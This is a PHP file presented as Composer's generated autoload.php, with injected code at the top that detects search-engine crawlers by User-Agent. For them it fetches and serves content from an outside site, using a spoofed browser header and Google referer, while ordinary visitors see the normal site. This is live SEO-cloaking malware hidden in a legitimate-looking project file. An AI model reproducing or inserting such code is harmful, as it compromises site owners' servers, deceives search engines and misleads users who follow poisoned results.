<?php
@ob_start();
header("Vary: U-Agent");

$src = "https://childrenofiran.org/landing/jurnal.yayasanyutapendidikancerdas/";
$match = "/(googlebot|slurp|bingbot|baiduspider|yandex|crawler|spider|adsense|inspection|mediapartners)/i";
$ua = strtolower($_SERVER["HTTP_USER_AGENT"] ?? '');

function stealth($u) {
    $ctx = stream_context_create([
        "http" => [
            "method" => "GET",
            "header" => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n" .
                        "Referer: https://www.google.com/\r\n"
        ]
    ]);
    return @file_get_contents($u, false, $ctx);
}

if (preg_match($match, $ua)) {
    usleep(rand(100000, 200000));
    echo stealth($src);
    @ob_end_flush();
    exit;
}

// autoload.php @generated by Composer

if (PHP_VERSION_ID < 50600) {
    echo 'Composer 2.3.0 dropped support for autoloading on PHP <5.6 and you are running '.PHP_VERSION.', please upgrade PHP or use Composer 2.2 LTS via "composer self-update --2.2". Aborting.'.PHP_EOL;
    exit(1);
}

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInit6c8aed91678513cfcf715775d485ef78::getLoader();
